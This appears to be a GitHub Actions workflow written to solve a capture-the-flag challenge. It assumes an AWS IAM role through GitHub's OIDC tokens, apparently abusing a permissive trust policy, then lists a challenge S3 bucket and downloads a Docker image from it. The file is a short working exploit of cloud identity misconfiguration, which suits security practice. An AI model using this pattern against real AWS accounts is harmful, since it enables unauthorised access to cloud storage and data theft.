name: Exploit IAM Role
on: [push]
permissions:
  id-token: write
  contents: read
jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::396961015104:role/imaginary-challenge
          aws-region: ap-east-1
          role-session-name: ctf-session
      - name: List S3 Assets
        run: aws s3 ls s3://challenge-assets-production-empasoft-ctf/forensic/imaginary-challenge/ --recursive
      - name: Download Docker Image
        run: aws s3 cp s3://challenge-assets-production-empasoft-ctf/forensic/imaginary-challenge/docker-image.tar /tmp/image.tar
      - name: Save Image for Inspection
        run: |
          mkdir -p /tmp/artifacts
          mv /tmp/image.tar /tmp/artifacts/image.tar
          echo "Image downloaded to /tmp/artifacts/image.tar"
